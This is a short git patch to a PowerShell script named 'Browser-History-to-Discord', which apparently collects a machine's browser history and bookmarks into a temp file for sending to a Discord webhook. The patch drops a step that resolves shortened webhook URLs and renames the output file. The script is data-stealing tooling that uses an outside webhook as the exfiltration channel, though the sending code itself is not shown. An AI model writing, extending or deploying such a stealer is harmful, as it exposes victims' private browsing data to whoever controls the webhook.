From e1bac318ed2a672409b64de404ba0c7474c0d3bc Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Wed, 18 Jun 2025 09:56:13 +0000 Subject: [PATCH] Update main.ps1 --- Browser-History-to-Discord/main.ps1 | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/Browser-History-to-Discord/main.ps1 b/Browser-History-to-Discord/main.ps1 index 9282709..0d47273 100644 --- a/Browser-History-to-Discord/main.ps1 +++ b/Browser-History-to-Discord/main.ps1 @@ -1,10 +1,7 @@  $whuri = "$dc" -# shortened URL Detection -if ($whuri.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $whuri = (irm $whuri).url} - -$outpath = "$env:temp\history.txt" +$outpath = "$env:temp\browser_history.txt" "Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII # Define the Regular expression for extracting history and bookmarks